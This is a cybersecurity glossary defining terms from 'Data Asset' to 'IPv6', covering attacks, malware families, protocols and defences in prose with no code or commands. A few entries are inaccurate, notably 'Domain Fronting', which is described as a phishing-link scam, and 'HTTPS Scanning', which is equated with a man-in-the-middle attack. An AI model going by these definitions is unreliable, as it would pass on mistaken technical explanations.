Data Asset - A data asset is a piece of information that contains valuable records. It can be a database, a document or any type of information that is managed as a single entity. Like any asset, the information involved contains financial value that is directly connected to the number of people that have access to that data and for this reason it needs to be protected accordingly.

Database - A database is an organized collection of data, generally stored and accessed electronically from a computer system. Where databases are more complex they are often developed using formal design and modeling techniques.

Data Integrity - Data integrity refers to information property that has not been altered or modified by an unauthorized person. The term is used to refer to information quality in a database, data warehouse or other online locations.

Data Leakage - Data leakage describes a loss of sensitive information, usually from a corporation or large company, that results in unauthorized personnel gaining access to valuable data assets. The sensitive data can be company information, financial details or other forms of data that put the company's name or its financial situation at risk.

Data Loss - Data loss is a process in which information is destroyed by failure or neglect in transmission or processing, or sometimes by cybercriminal hands. To prevent data loss, IT teams install backup and recovery equipment to avoid losing important information.

Data Theft - Data theft describes illegal operations in which private information is retrieved from a company or an individual. Usually, the stolen data includes credentials for online accounts and banking sites, credit card details or valuable corporate information. In recent years these types of operations have increased, and it has now become necessary to protect data by additional security means.

Declassify - An administrative process to remove classification markings, security designations, and handling conditions when information is no longer considered to be sensitive.

Dedicated IP - In web hosting, a unique Internet address that is assigned exclusively to a single hosting account. A dedicated IP address lets you view your website via its IP address, and use FTP to access your account while the domain name is otherwise inaccessible, such as during domain name propagation periods.

Dedicated Web Hosting - A dedicated hosting service, dedicated server, or managed hosting service is a type of Internet hosting in which the client leases an entire server not shared with anyone else.

Deep Web - The deep web is a similar concept to the dark web, but has a less shady nature. The world wide web content which is not indexed by traditional search engines is known as the deep web, and preferred by certain groups for its increased privacy levels. However, unlike the dark web, the deep web doesn’t require its users to be particularly tech-savvy, and is not hidden by sophisticated methods; all you need is to know the address of the website you want to access.

Defense In Depth - A phishing defense strategy that uses multiple levels of security to prevent phishing, so that if one layer of defense turns out to be inadequate, additional layers are in place in order to prevent a full breach.

Defence in Depth - An IT security concept (also known as the Castle Approach) in which multiple layers of security are used to protect the integrity of information. These layers can include antivirus and antispyware software, firewalls, hierarchical passwords, intrusion detection, and biometric identification.

Demilitarized Zone - Also referred to as a perimeter network, the demilitarized zone (DMZ) is a less-secure portion of a network, which is located between any two policy-enforcing components of the network (e.g. between the Internet and internal networks). An organization uses a DMZ to host its own Internet services without risking unauthorized access to its private network.

Denial of Service Attack - An attempt by individuals, organized groups, hacktivist collectives such as Anonymous, or DoS-as-a-service operators to block legitimate users from accessing a service. In a DoS attack, the attacker usually sends excessive messages asking the network or server to authenticate requests that have invalid return addresses. Distributed Denial of Service attacks are those in which multiple compromised systems are used to target a system.

Departmental Security Control Profile - A set of security controls that establishes an organization's minimum mandatory IT security requirements.

Departmental Security Officer - The individual responsible for a department’s or organization’s security program.

Departmental Security Requirement - Any security requirements prescribed by senior officials of a department that applies generally to its information systems.

Detection - The monitoring and analyzing of system events in order to identify unauthorized attempts to access system resources.

DHCP Server - The Dynamic Host Configuration Protocol (DHCP) is a network management protocol used on Internet Protocol (IP) networks for automatically assigning IP addresses and other communication parameters to devices connected to the network using a client–server architecture.

Dialer - A dialer in the information security world is a spyware device or program that is used to maliciously redirect online communication. Such software disconnects the legitimate phone connection and reconnects to a premium rate number, which results in an expensive phone bill for the user. It usually installs itself on the user's system.

Dictionary Attack - A dictionary attack is a form of brute force attack for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase through hundreds or sometimes millions of likely possibilities, such as words in a dictionary.

Digital Signature - A digital signature is a technique used to encrypt and validate the authenticity and integrity of a message, software or digital document. The digital signature is difficult for a hacker to duplicate, which is why it is important in information security.

Digital Skimming - Digital skimming is a term describing the action of stealing credentials and sensitive payment information from website visitors. Digital skimmers use pre-placed malicious JavaScript code that sniffs user input from sensitive forms or creates a malicious iframe with fake payment forms to sniff credit card information.

Directory Traversal - Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access to restricted directories and files. Directory traversal, also known as path traversal, ranks #13 on the CWE/SANS Top 25 Most Dangerous Software Errors. Directory traversal attacks use web server software to exploit inadequate security mechanisms and access directories and files stored outside of the web root folder. An attacker that exploits a directory traversal vulnerability is capable of compromising the entire web server.

Disaster Recovery Plan DRP - A recovery plan is a set of procedures that are meant to protect or limit potential loss in a business IT infrastructure in case of an online attack or major hardware or software failure. A recovery plan should be developed during the business impact analysis process.

DMZ - In computer security, a DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization's external-facing services to an untrusted network, usually a larger network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization's local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization's network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network and, if its design is effective, allows the organization extra time to detect and address breaches before they would further penetrate into the internal networks.

DNS Cache Poisoning - DNS cache poisoning, also known as DNS spoofing, is the act of placing false information in a DNS resolver cache.

DNS Hijacking - DNS hijacking is a process in which an individual redirects queries to a DNS (Domain Name System). It may be accomplished through the use of malicious software or unauthorized modification of a server.

DNS Over HTTPS - Established in 2018, DNS over HTTPS (DoH) is a protocol for performing remote Domain Name System (DNS) resolution via the HTTPS protocol. A goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data through man-in-the-middle attacks, using the HTTPS protocol to encrypt the data between the DoH client and the DoH-based DNS resolver. DoH is used for recursive DNS resolution by DNS resolvers. Resolvers (DoH clients) must have access to a DoH server hosting a query endpoint. DoH lacks native support in operating systems. Thus, a user wishing to use it must install additional software.

DNS Over TLS - DNS over TLS (DoT) is a security protocol for encrypting and wrapping Domain Name System (DNS) queries and answers via the Transport Layer Security (TLS) protocol. The goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data via man-in-the-middle attacks. As of 2019, Cloudflare, Quad9, Google, Quadrant Information Security, CleanBrowsing and LibreOps are providing public DNS resolver services via DNS over TLS.

DNS Request - A DNS query (also known as a DNS request) is a request for information sent from a user's computer (DNS client) to a DNS server. In most cases a DNS request is sent to ask for the IP address associated with a domain name.

DNS Tunneling - DNS tunneling uses DNS requests to implement a command and control channel for malware. Inbound DNS traffic can carry commands to the malware, while outbound traffic can exfiltrate sensitive data or provide responses to the malware operator’s requests. This works because DNS is a very flexible protocol. There are very few restrictions on the data that a DNS request contains because it is designed to look for domain names of websites. Since almost anything can be a domain name, these fields can be used to carry sensitive information. These requests are designed to go to attacker-controlled DNS servers, ensuring that they can receive the requests and respond in the corresponding DNS replies.

Document Malware - Also called document-based malware. Cybercriminals use email to deliver a document containing malicious software, also known as malware. Typically, either the malware is hidden directly in the document itself or an embedded script downloads it from an external website.

Domain Fronting - This phishing scam begins with an email asking recipients to click on a link designed to look like a legitimate site, which then re-routes them to another unsafe site where hackers steal sensitive information. Originally developed as a way for political and human rights activists living under repressive regimes to circumvent heavy censorship, the technique has been hijacked by cybercriminals for nefarious purposes.

Domain Generation Algorithm DGA - Domain generation algorithms (DGA) are algorithms seen in various families of malware that are used to periodically generate a large number of domain names that can be used as rendezvous points with their command and control servers.

Domain Shadowing - Domain Shadowing is a malicious tactic used by cyber criminals to build their infrastructure and launch attacks while remaining undetected. First, attackers steal and gather credentials for domain accounts. Using these stolen credentials, they log into the domain account and create subdomains which redirect traffic towards malicious servers, without the domain owner having any knowledge of this. Domain shadowing allows cyber attackers to bypass reputation-based filters and pass their malicious traffic as safe.

Dormant Code - Modern, advanced malware often has a modular structure, including multiple components. One of them is dormant code, which means that the malware needs specific triggers to execute the task it was created for. This type of behavior is coded into the malware so it can bypass signature-based detection in products such as traditional antivirus and anti-malware solutions. There is also another reason for using dormant code: since advanced malware, such as ransomware or financial malware, usually relies on external infrastructure to download components for infection, the malware can remain dormant and undetected if it can't reach its Command and Control servers to execute further.

Doxxing - Gathering an individual's Personally Identifiable Information (PII) and disclosing or posting it publicly, usually for malicious purposes such as public humiliation, stalking, identity theft, or targeting an individual for harassment.

Dridex - Dridex is a strain of financial malware that uses Microsoft Office macros to infect information systems. Dridex is engineered to collect and steal banking credentials and additional personal information and its fundamental objective is banking fraud.

Drive-By Attack - A drive-by attack is the unintentional download of a virus or malicious software (malware) onto your system. A drive-by attack will usually take advantage of (or “exploit”) a browser, app, or operating system that is out of date and has a security flaw.

Due Diligence - Due diligence is an investigation or audit of a potential investment or product to confirm all facts, that might include the review of financial records. Due diligence refers to the research done before entering into an agreement or a financial transaction with another party.

Dumpster Diving - One man's trash is another man's playground.

Dyreza, Dyre - Dyreza (also called Dyre) is a banking Trojan (financial malware) that appeared in 2014, whose behavior is similar to the ZeuS family, although there is no connection between Dyreza and ZeuS. The malware hides in popular web browsers that millions of users employ to access the web and aims to retrieve sensitive financial information every time the victim connects to a banking website. Dyreza is capable of key-logging, circumventing SSL mechanisms and two-factor authentication, and is usually spread through phishing emails.

Eavesdropping Attack - Network Eavesdropping or network sniffing is an attack that aims to capture information transmitted over a network by other computers. The objective is to acquire sensitive information like passwords, session tokens, or any kind of confidential information.

Edge Interface - A network-layer service interface point that attaches an end system, internal boundary system, or zone interface point to a zone internetwork.

Email Hosting - Email hosting is a service in which your email messages and associated files are all stored on a server. When you receive an email to your website's domain address, the email is routed across the internet and stored on the recipient server.

Email Malware Distribution - Although outdated, some malware families still use email attachments as a means of spreading malware and infecting users’ computers. This type of infection relies on the user double-clicking the attachment. A more current method that uses email as a distribution mechanism is inserting links to malicious websites.

Emission Security - The measures taken to reduce the risk of unauthorized interception of unintentional emissions from information technology equipment that processes classified data.

Emotet - Emotet is a modular infostealer that downloads or drops banking trojans. It can be delivered through either malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also incorporates spreader modules in order to propagate throughout a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.

Encapsulation - Encapsulation refers to a programming approach that revolves around data and functions contained, or encapsulated, within a set of operating instructions. Applications become vulnerable to an attack when they fail to separate or differentiate critical data or functionality within components. When an encapsulation vulnerability exists, bad code creeps across software components or "leaks" from an application. This problem can also lead to cross-domain attacks. Without strong and clearly defined boundaries between control spheres, attackers can gain unauthorized access to data and functions.

Encrypted Network - Network encryption is the process of encrypting or encoding data and messages transmitted or communicated over a computer network. It is a broad process that includes various tools, techniques and standards to ensure that the messages are unreadable when in transit between two or more network nodes.

Encryption - In cryptography, encryption is the process of encoding a message or information in such a way that only authorized parties can access it and those who are not authorized cannot. Encryption does not itself prevent interference, but denies the intelligible content to a would-be interceptor.

End to End Encryption - This process involves using communications encryption to make information unavailable to third parties. When passed through a network, the information will only be readable by the sender and the receiver, preventing ISPs or application service providers from discovering or tampering with the content of the communication.

End to End Security - End-to-end security is a term used in telecommunications to refer to safeguarding information by using encryption to ensure its security from the point of origin to the point of destination.

Endpoint Identifiers - Abbreviated as EID, an endpoint identifier is used to specify and uniquely identify endpoints connected to the network. Information about the topological location of an endpoint in an internetwork is given by a locator.

Endpoint Detection and Response - Endpoint Detection and Response, or EDR, is a form of technology that provides continuous monitoring and response to advanced cybersecurity threats. EDR is a subset of endpoint security, which handles the holistic protection of corporate networks and data when employees access the network remotely via laptops, smartphones, and other mobile devices.

Endpoint Security - In network security, endpoint security refers to a methodology of protecting the corporate network when accessed via remote devices such as laptops or other wireless and mobile devices. Each device with a remote connection to the network creates a potential entry point for security threats. Endpoint security is designed to secure each endpoint on the network created by these devices.

End System - A network-connected computer that, for a given communication, is its source or destination.

End User Systems - End systems for human use, such as a desktop with a personal computer (display, keyboard, mouse, and operating system).

Entropy - In information theory, entropy is the measure of uncertainty associated with a random variable. In terms of cryptography, entropy must be supplied by the cipher for injection into the plaintext of a message so as to neutralise the amount of structure that is present in the insecure plaintext message.

Enterprise Risk Management - The methods and processes that organizations use to identify and manage cyber security risks that could endanger their corporate mission. As part of this plan, the organization also establishes a plan to protect its assets and a plan to react in case a cyber security risk becomes reality.

Error Handling Flaws - The most common vulnerabilities occur when a system reveals detailed error messages or codes generated from stack traces, database dumps, and a wide variety of other problems, including out of memory, null pointer exceptions, and network timeout errors.

Escrow Key - Key escrow (also known as a “fair” cryptosystem) is an arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys.

Ethernet - An Ethernet adapter connects a computer to the Internet or a local network by a wired connection. Most computers include an Ethernet port on the motherboard. Newer computers may only support WiFi connections.

Equipment emanation - An electric field radiation that comes from the equipment as a result of processing or generating information.

Evaluator - An evaluation team composed of the National Research Council – Industrial Research Assistance Program (NRC-IRAP), PWGSC and/or subject matter experts from other government departments will evaluate proposals. If required, Canada may use an external Subject Matter Expert to evaluate any proposal.

Evil Maid Attack - An attack on an unattended device, in which an attacker with physical access alters it in some undetectable way so that they can later access the device, or the data on it.

Exploit - An exploit (from the English verb to exploit, meaning "to use something to one’s own advantage") is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). Such behavior frequently includes things like gaining control of a computer system, allowing privilege escalation, or a denial-of-service (DoS or related DDoS) attack.

Exploit Kits - Exploit kits (EKs) are computer programs designed to find flaws, weaknesses or mistakes in software apps (commonly known as vulnerabilities) and use them to gain access into a system or a network. They are used in the first stages of a cyber attack, because they have the ability to download malicious files and feed the attacked system with malicious code after infiltrating it.

Exploit Kits-as-a-Service - Exploit kits as-a-service are a relatively recent business model employed by cyber criminals, in which they create, manage and sell or rent exploit kits that are accessible and easy to use in cyber attacks. Exploit kits-as-a-service don’t require much technical expertise to use; they are cheaper (especially if rented), flexible, can be packed with different types of malware, offer broader reach, are usually difficult to detect and can be used to exploit a wide range of vulnerabilities. This business model makes it very profitable for exploit kit makers to sell their malicious code and increase their revenues.

External Security Testing - Security testing conducted from outside the organization’s security perimeter.

Exfiltration - The unauthorized removal of data or files from a system by an intruder.

Firewall - A security barrier placed between two networks that controls the amount and kinds of traffic that may pass between the two. This protects local system resources from being accessed from the outside.

Fail Safe - A Fail-Safe security system or device is an automatic protection system that intervenes when a hardware or software failure is detected.

Fake Antivirus Malware - Rogue antivirus or rogue security software is a form of computer malware that simulates a system infection that needs to be removed. Users are asked for money in return for removing the supposed malware, but the program is nothing but a form of ransomware.

False Positive - A false positive is identified when a security solution detects a potential cyber threat which is, in fact, a harmless piece of software or a benign software behavior. For example, your antivirus could inform you that there's a malware threat on your PC, but it could happen that the program it's blocking is safe.

Femtocell - Smallest type of small cell used to expand cellular network connectivity within a targeted geographic area (typically a small, single location).

Field-Programmable Gate Arrays FPGA - A field-programmable gate array (FPGA) is an integrated circuit that can be programmed or reprogrammed to the required functionality or application after manufacturing. Important characteristics of field-programmable gate arrays include lower complexity, higher speed, volume designs and programmable functions.

File Binder - File binders are applications used by online criminals to connect multiple files together in one executable that can be used in launching malware attacks.

Fileless Malware - Fileless malware is a type of malicious code used in cyber attacks that doesn’t use files to launch the attack and carry on the infection on the affected device or network. The infection runs in the device’s RAM, so traditional antivirus and antimalware solutions can’t detect it at all. Malicious hackers use fileless malware to achieve stealth, privilege escalation, to gather sensitive information and to achieve persistence in the system, so the malware infection can continue to carry on its effect for a longer period of time.

Fileless Threats - The term "fileless" suggests that a threat does not come in a file, such as a backdoor that lives only in the memory of a machine. However, there's no generally accepted definition for fileless malware. The term is used broadly; it's also used to describe malware families that do rely on files to operate.

Financial Malware - Financial malware is a category of specialized malicious software designed to harvest financial information and use it to extract money from victims’ accounts. Because it is a rather new type of malware, it is also very sophisticated and it can easily bypass traditional security measures, such as antivirus. Financial malware is capable of persisting in the affected system for a long time, until it gathers the information associated with financial transactions and it can start to leak money from the targeted account. Banking fraud cyber crimes are one of the most serious cyber threats in the current risk landscape.

Firmware - Type of software that is etched directly into a piece of hardware. It operates without going through APIs, the operating system, or device drivers—providing the needed instructions and guidance for the device to communicate with other devices or perform a set of basic tasks and functions as intended.

Flip Button - In the malware world, a flip button appears when spyware or adware solutions trick users into following various actions and installing malicious software on the system.

Flooding - Flooding is a security attack used by hackers against a number of servers or web locations. Flooding is the process of sending a large amount of information to such a location in order to block its processing power and stop its proper operation.

Forensic Specialist - A Computer Forensics Investigator or Forensic Analyst is a specially trained professional who works with law enforcement agencies, as well as private firms, to retrieve information from computers and other types of data storage devices.

Form Grabbing Malware - This type of malware can harvest your confidential data when you're filling in a web form, before the data is sent over the Internet to a secure server. By doing this, the malware can avoid the security ensured by an HTTPS connection. Unfortunately, using a virtual keyboard, autofill or copy/paste won't protect you from this threat. What's more, the malware can categorize data according to type (username, password, etc.) and even grab the URL where you were inputting your information.

Frame Loss - Frame loss is defined as the percentage of frames that were successfully transmitted from the source but were never received at the destination. Since frame loss is usually caused by a lack of resources, this measurement acts as an indicator of how a device will perform under a heavy load.

FTP - File Transfer Protocol is a standard network protocol used for the transfer of computer files between a client and server on a computer network. It is generally considered to be an insecure protocol because it relies on clear-text usernames and passwords for authentication and does not use encryption. Data sent via FTP is vulnerable to sniffing, spoofing, and brute force attacks, among other basic attack methods.

Gateway - An intermediate system that is the interface between two computer networks. A gateway can be a server, firewall, router, or other device that enables data to flow through a network.

Geolocation - Geolocation, or geopositioning, refers to the process of determining or estimating the geographic position of an object. This yields a set of geographic coordinates (such as latitude and longitude) in a given map datum; positions may also be expressed as a bearing and range from a known landmark. In turn, positions can determine a meaningful location, such as a street address.

Global Information Grid GIG - The global information grid is the globally interconnected, end-to-end set of information capabilities for collecting, processing, storing, disseminating, and managing information on demand to warfighters, policy makers, and support personnel. The GIG includes owned and leased communications and computing systems and services, software (including applications), data, security services, other associated services, and National Security Systems. Non-GIG IT includes stand-alone, self-contained, or embedded IT that is not, and will not be, connected to the enterprise network.

Global Information Infrastructure GII - The Global Information Infrastructure is the worldwide interconnections of the information systems of all countries, international and multinational organizations, and international commercial communications.

Glossary - A glossary, also known as a vocabulary or clavis, is an alphabetical list of terms in a particular domain of knowledge with the definitions for those terms. Traditionally, a glossary appears at the end of a book and includes terms within that book that are either newly introduced, uncommon, or specialized.

GNU - The name GNU stands for “GNU’s Not Unix” (GNU is pronounced g’noo). The development of GNU started in January 1984 and is known as the GNU Project. GNU is a Unix-like operating system (OS) that comprises many programs such as applications, libraries, developer tools and games. GNU is available with source code, which allows a user to run, copy, modify, distribute, study, change, and improve the software.

Gnutella - Gnutella is an open file sharing or peer-to-peer (P2P) network that was originally developed by Justin Frankel and Tom Pepper of Nullsoft in early 2000. It was the first decentralised file sharing network, in which each node acts as a server for sharing files while simultaneously acting as a client that searches for and downloads files from other users.

Gh0st - Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device.

Governance, Risk Management and Compliance - Governance, Risk Management and Compliance is a comprehensive and integrated organization-wide system for achieving the goals set in each area, namely governance, risk management and compliance, and for meeting regulatory standards and requirements.

Graduated Security - Graduated security is a security system that provides several levels of protection based on threats, risks, available technology, support services, time, human concerns, and economics.

Grants - A transfer payment subject to pre-established eligibility and entitlement criteria. A grant is not subject to being accounted for by a recipient nor normally subject to audit by the department. The recipient may be required to report on results achieved.

Green Hosting - Eco-friendly hosting is Internet hosting which involves green technologies to reduce environmental impact. Green hosting includes carbon offsetting, powering a data center directly with renewable energy, planting trees, plants and grass around and over data centers and more day-to-day activities such as energy conservation and the use of energy saving appliances.

Grey Hat Hacker - Greyhat hackers have a more ambiguous mode of operation compared to blackhat and whitehat hackers. For instance, they may use illegal means to detect a vulnerability, but then disclose it to the targeted organization. Another perspective on greyhat hackers focuses on those that find exploits, and then sell the know-how to governments but only after receiving a payment. Greyhat hackers distinguish themselves from blackhat hackers on a single important criterion: they don’t use or sell the exploit for criminal gain.

Group Authenticator - A group authenticator is used sometimes in addition to a sign-on authenticator, to allow access to specific data or functions that may be shared by all members of a particular group.

Guard - A gateway that is placed between two networks, computers, or other information systems that operate at different security levels. The guard mediates all information transfers between the two levels so that no sensitive information from the higher security level is disclosed to the lower level. It also protects the integrity of data on the higher level.

Guard System - A guard system is a mechanism limiting the exchange of information between information systems or subsystems.

Guessing Entropy - A guessing entropy is a measure of the difficulty that an Attacker has to guess the average password used in a system. In this document, entropy is stated in bits. When a password has n-bits of guessing entropy then an attacker has as much difficulty guessing the average password as in guessing an n-bit random quantity. The attacker is assumed to know the actual password frequency distribution.

Guideline - A guideline is a general rule or piece of advice that must be followed in order to accomplish the set goals of an organization.

HaaS - Hardware as a Service (HaaS) is a service provision model for hardware that is defined differently in managed services and grid computing contexts.

Hackathon - A social coding event that brings computer programmers and other interested people together to improve upon or build a new software program.

Hacker - Hacking refers to activities that seek to compromise digital devices, such as computers, smartphones, tablets, and even entire networks. And while hacking might not always be for malicious purposes, nowadays most references to hacking, and hackers, characterize it/them as unlawful activity by cybercriminals—motivated by financial gain, protest, information gathering (spying), and even just for the “fun” of the challenge.

Hackerazzi - Cybercriminals who hack into the email accounts of celebrities to access and exploit their private information.

Hacktivism - Hacktivism is the activity of using hacking techniques to protest against or fight for political and social objectives. One of the most well known hacktivist groups in the world is Anonymous.

Handwriting Recognition and Mouse Gestures - Many PDAs and, more recently, tablet PCs can convert pen (also called stylus) movements on their touchscreens into computer-readable text. Mouse gestures use this principle with mouse movements instead of a stylus. Mouse gesture programs convert these strokes into user-definable actions, such as typing text. Similarly, graphics tablets and light pens can be used to input these gestures, though these are less common in everyday use. The same potential weakness of speech recognition applies to this technique as well.

Hardening - In computing, hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one.

HeartBleed - Heartbleed is a security bug that appeared in 2014 and exposed information that was usually protected by SSL/TLS encryption. Because of a serious vulnerability in the OpenSSL library, attackers could steal data that was kept confidential by the encryption used to secure the Internet. This bug caused around 500,000 web servers (17% of all servers on the Internet) to be exposed to potential data theft.

Hoax - A hoax is a false computer virus warning. You may receive such hoaxes via email, instant messaging or social media. Before acting on it, be sure to go online and check the validity of the claim. Also, when you have proof that it's fake, it's a good idea to inform the sender as well. Remember that such hoaxes can lead to malicious websites which can infect your devices with malware.

Honeymonkey - This is an automated system designed to simulate the actions of a user who’s browsing websites on the Internet. The purpose of the system is to identify malicious websites that try to exploit vulnerabilities that the browser might have. Another name for this is Honey Client.

Honeynet - A decoy network that contains one or more honeypots. It looks like a real network and contains multiple systems but is hosted on one or only a few servers, each representing one environment. For example, a Windows honeypot machine, a Mac honeypot machine and a Linux honeypot machine.

Honeypot - This is a program used for security purposes which is able to simulate one or more network services that look like a computer’s ports. When an attacker tries to infiltrate, the honeypot will make the target system appear vulnerable. In the background, it will log access attempts to the ports, which can even include data like the attacker’s keystrokes. The data collected by a honeypot can then be used to anticipate incoming attacks and improve security in companies.

Host Based Intrusion Detection System - A host-based intrusion detection system (HIDS) is an intrusion detection system that is capable of monitoring and analyzing the internals of a computing system as well as the network packets on its network interfaces, similar to the way a network-based intrusion detection system (NIDS) operates.

Hosts File - The computer file hosts is an operating system file that maps hostnames to IP addresses. In modern operating systems, the hosts file remains an alternative name resolution mechanism, configurable often as part of facilities such as the Name Service Switch as either the primary method or as a fallback method.

HTTP Status Code - Hypertext Transfer Protocol response status codes are issued by a server in response to a client's request made to the server.

HTTPS - Hypertext Transfer Protocol Secure is an extension of the Hypertext Transfer Protocol. It is used for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is encrypted using Transport Layer Security or, formerly, Secure Sockets Layer.

HTTPS Scanning - This is another name for a Man-in-the-Middle attack. Scanning HTTPS (Hypertext Transfer Protocol Secure) content allows the attackers to decrypt, analyze, and re-encrypt content between websites that use SSL (Secure Sockets Layer) for security and a user’s browser. This type of attack is usually used to snoop in on information exchanges and steal confidential data.

Human Firewall - The act of relying on employees to protect the company from phishing by providing phishing awareness training. Unfortunately, this technique is insufficient as a stand-alone defense against phishing attacks.

Human Interface Device HID Spoofing - HID spoofing keys use specialized hardware to fool a computer into believing that the USB key is a keyboard. This fake keyboard injects keystrokes as soon as the device is plugged into the computer. The keystrokes are a set of commands that compromise the victim’s computer.

Hybrid Attack - A hybrid attack makes a dictionary attack (used to crack passwords) even stronger by adding numerals and symbols, so credentials can be hacked even faster.

Hypervisor Level Rootkits - Hypervisor (Virtualized) Level Rootkits are created by exploiting hardware features such as Intel VT or AMD-V (hardware-assisted virtualization technologies). Hypervisor level rootkits host the target operating system as a virtual machine and therefore can intercept all hardware calls made by the target operating system.

IcedID - IcedID is a modular banking Trojan targeting banks, payment card providers, and payroll websites. IcedID utilizes the same distribution infrastructure as Emotet. The malware can monitor a victim’s online activity by setting up local proxies for traffic tunneling, employing web injection and redirection attacks. It propagates across a network by infecting terminal servers.

ICMP - A supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information indicating success or failure when communicating with another IP address, for example, an error is indicated when a requested service is not available or that a host or router could not be reached.

Ideal Circumstances - Perfect or without equal. Under ideal circumstances, one would compare the reconstruction side by side with the original system.

Identity Theft - Identity theft refers to the process of stealing someone’s personal identification data and using it online in order to pose as that person. Hackers can make use of a person’s name, photos, papers, social security number and so on, to gain financial advantage at this person’s expense (by obtaining credit or by blackmailing), or as a means of damaging the person’s reputation etc.

Inadvertent Disclosure - This type of security incident involves accidentally exposing information to an individual who doesn’t have access to that particular data.

Incremental Backups - Incremental backups are extremely important for keeping information safe and up to date. This type of backup will only back up the files that you’ve modified since performing the last backup. This means the backup is faster and you can ensure that you’ll always have all your work backed up safely.

Information Assurance IA - This is a set of measures designed to protect and defend data and information systems by ensuring that they are always available, that their integrity is safe, that they’re confidential and authentic (non-repudiation principle). These measures include having a data backup to restore information in case of an unfortunate event, having cyber security safeguards in place and ensuring that detection and reaction capabilities are featured.

Information Flow (information theory) - Information flow in an information-theoretic context is the transfer of information from a variable x to a variable y in a given process. Not all flows may be desirable; for example, a system should not leak any secret (partially or not) to public observers.

Information Flow Control - This is an important safeguard in companies, created to ensure that data transfers in an information system comply with the security policy and are as safe as possible.

Information Security - Information security, often referred to as InfoSec, refers to the processes and tools designed and deployed to protect sensitive business information from modification, disruption, destruction, and inspection.

Information Security Policy - Information security policy is a set of policies issued by an organization to ensure that all information technology users within the domain of the organization or its networks comply with rules and guidelines related to the security of the information stored digitally at any point in the network or within the organization's boundaries of authority.

Information Security Risk - Information security risk comprises the impacts to an organization and its stakeholders that could occur due to the threats and vulnerabilities associated with the operation and use of information systems and the environments in which those systems operate.

Information System Resilience - The ability of an information system to continue to: (i) operate under adverse conditions or stress, even if in a degraded or debilitated state, while maintaining essential operational capabilities; and (ii) recover to an effective operational posture in a time frame consistent with mission needs.

Information Systems Security (INFOSEC) - The protection of information systems against unauthorized access to or modification of information, whether in storage, processing or transit, and against the denial of service to authorized users, including those measures necessary to detect, document, and counter such threats. See information assurance (IA).

Injury - The damage to the national interests and non-national interests that business activities serve resulting from the compromise of IT assets.

Insider Threat - An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization's security practices, data and computer systems.

Integrated Services Digital Network ISDN - Integrated Services Digital Network is a set of communication standards for simultaneous digital transmission of voice, video, data, and other network services over the traditional circuits of the public switched telephone network. It was first defined in 1988 in the CCITT red book.

Integrity - This is one of the core principles in cyber security; it refers to ensuring that information has not been changed (deliberately or accidentally), and that the data is accurate and complete.

Interface - A boundary across which two systems communicate. An interface might be a hardware connector used to link to other devices, or it might be a convention used to allow communication between two software systems.

Internet of Things - Computing concept that describes the idea of everyday physical objects being connected to the internet and being able to identify themselves to other devices and send and receive data. The term is closely identified with radio frequency identification (RFID) as the method of communication, although it also may include other sensor technologies, wireless technologies or QR codes. IoT devices can gather data from urban and public areas to affect the environment, public safety and resource management. Factories and cities will become smart, interconnected pieces of the larger IoT system through the widespread implementation of regional sensors.

Internet Protocol - The Internet Protocol (IP) is the principal communications protocol in the Internet protocol suite for relaying datagrams across network boundaries. Its routing function enables internetworking, and essentially establishes the Internet. An IP address is a logical address assigned at Layer 3 and can be assigned to an IP-based system. The same IP address can be assigned to different systems, albeit at different times, unlike MAC addresses.

Internet Protocol Conflict - An IP address conflict occurs when two devices on the same local physical or wireless network claim to have the same IP address. A second assignment of an address generally stops the IP functionality of one or both of the devices.

Internetwork Packet Exchange IPX - A networking protocol used by the Novell NetWare operating systems. Like UDP/IP, IPX is a datagram protocol used for connectionless communications. Higher-level protocols, such as SPX and NCP, are used for additional error recovery services.

Intellectual Property - This refers to useful artistic, technical or industrial information, concepts, ideas or knowledge that clearly show that they’re owned by someone who has control over them, either in physical form or in representation.

Internal Security Testing - This type of testing is conducted from inside an organization, to examine the resilience and strength of a company’s security perimeter and defenses.

Intrusion - In cyber security, intrusion refers to the act of getting around a system’s security mechanisms to gain unauthorized access.

Intrusion Detection Systems IDS - An intrusion detection system (IDS) is a software application or hardware appliance that monitors traffic moving on networks and through systems to search for suspicious activity and known threats, sending up alerts when it finds such items.

IP Security (IPSec) - In computing, Internet Protocol Security is a secure network protocol suite that authenticates and encrypts the packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in virtual private networks.

IP Spoofing - This is a tactic used by cyber criminals to supply a false IP address that masquerades as a legitimate IP. This helps the attacker gain an unfair advantage and trick the user or a cyber security solution that’s in place.

IT Asset - The components of an information system, including business applications, data, hardware, and software.

IT Threat - Any potential event or act (deliberate or accidental) or natural hazard that could compromise IT assets.

IP Passthrough - Use your own router behind the ISP-provided gateway. The signal is terminated (unlike bridge mode) at the gateway, which allows the ISP to connect to the gateway with its own IP. Traffic will pass through the gateway and the ISP-provided public IP address will be assigned to your router.

IPv4 - Internet Protocol version 4 (IPv4) defines an IP address as a 32-bit number. It is one of the core protocols of standards-based internetworking methods in the Internet and other packet-switched networks.

IPv6 - Internet Protocol version 6 (IPv6) defines an IP address as a 128-bit number. It is the most recent version of the Internet Protocol (IP), the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet.

